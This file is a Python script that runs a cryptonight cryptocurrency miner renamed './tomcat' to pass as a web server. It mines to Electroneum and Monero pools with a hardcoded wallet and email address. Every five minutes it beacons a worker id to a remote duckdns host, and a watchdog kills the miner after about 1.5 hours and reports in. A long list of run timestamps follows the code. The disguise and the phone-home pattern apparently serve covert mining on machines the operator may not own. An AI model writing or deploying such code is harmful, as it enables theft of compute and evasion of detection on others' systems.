import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:53:04.943465
#2018-02-17 16:41:07.753355
#2018-02-17 18:28:05.889705
#2018-02-17 20:17:05.018309
#2018-02-17 22:05:06.518061
#2018-02-17 23:49:06.325822
#2018-02-18 01:40:06.261343
#2018-02-18 03:27:06.101173
#2018-02-18 05:14:07.372698
#2018-02-18 07:07:05.913950
#2018-02-18 08:55:06.507043
#2018-02-18 10:42:01.269022
#2018-02-18 12:26:05.659291
#2018-02-18 14:14:05.326394
#2018-02-18 16:04:07.479360
#2018-02-18 17:53:01.771005
#2018-02-18 19:40:01.247056
#2018-02-18 21:25:04.067177
#2018-02-18 23:14:04.961411
#2018-02-19 01:01:05.956711
#2018-02-19 02:48:04.109353
#2018-02-19 04:34:01.899150
#2018-02-19 06:19:01.399044
#2018-02-19 08:06:07.808649
#2018-02-19 09:56:05.975396
#2018-02-19 11:46:08.020188
#2018-02-19 13:32:06.358822
#2018-02-19 15:22:04.499611
#2018-02-19 17:10:05.426082
#2018-02-19 18:58:05.433625
#2018-02-19 20:44:07.944720
#2018-02-19 22:31:05.653110
#2018-02-20 00:16:08.154943
#2018-02-20 02:04:05.670369
#2018-02-20 03:54:05.064536
#2018-02-20 05:38:06.731447
#2018-02-20 07:23:01.349012
#2018-02-20 09:08:04.080599
#2018-02-20 10:51:01.323417
#2018-02-20 12:38:09.231210
#2018-02-20 14:23:08.464433
#2018-02-20 16:09:01.824582
#2018-02-20 17:54:04.299174
#2018-02-20 19:44:08.417966
#2018-02-20 21:33:06.700842
#2018-02-20 23:15:09.711549
#2018-02-21 01:01:04.092546
#2018-02-21 02:47:04.250766
#2018-02-21 04:48:04.200321
#2018-02-21 06:32:03.120433
#2018-02-21 08:17:07.651140
#2018-02-21 10:03:06.089151
#2018-02-21 11:50:08.630328
#2018-02-21 13:41:10.408867
#2018-02-21 15:24:12.814670
#2018-02-21 17:14:01.848564
#2018-02-21 19:01:06.439463
#2018-02-21 20:48:08.376107
#2018-02-21 22:32:08.485174
#2018-02-22 00:22:08.781821
#2018-02-22 02:11:01.611384
#2018-02-22 03:56:06.014022
#2018-02-22 05:43:03.797552
#2018-02-22 07:28:03.817107
#2018-02-22 09:15:10.056122
#2018-02-22 11:04:08.071235
#2018-02-22 12:51:10.326353
#2018-02-22 14:41:07.986043
#2018-02-22 16:26:08.163776
#2018-02-22 18:12:12.409520
#2018-02-22 20:02:04.541244
#2018-02-22 21:50:07.292609
#2018-02-22 23:37:01.423424
#2018-02-23 01:24:05.518549
#2018-02-23 03:10:07.698302
#2018-02-23 04:57:04.628762
#2018-02-23 06:41:05.695316
#2018-02-23 08:31:06.931511
#2018-02-23 10:45:02.891568
#2018-02-23 12:42:07.342220
#2018-02-23 14:25:01.897804
#2018-02-23 16:16:04.401432
#2018-02-23 18:03:07.615928
#2018-02-23 19:48:06.558641
#2018-02-23 21:32:05.845038
#2018-02-23 23:20:03.762375
#2018-02-24 01:09:03.712588
#2018-02-24 03:01:06.898302
#2018-02-24 04:47:03.228823
#2018-02-24 06:32:05.055743
#2018-02-24 08:21:06.444613
#2018-02-24 10:05:06.960593
#2018-02-24 12:03:01.615778
#2018-02-24 13:50:07.609725
#2018-02-24 15:40:04.442442
#2018-02-24 17:34:06.219767
#2018-02-24 19:20:06.392405
#2018-02-24 21:10:07.021886
#2018-02-24 23:43:07.390783
#2018-02-25 03:41:02.007392
#2018-02-25 06:21:07.330588
#2018-02-25 11:34:06.749225
#2018-02-25 13:15:04.289061
#2018-02-25 14:48:02.167121
#2018-02-25 16:21:02.128696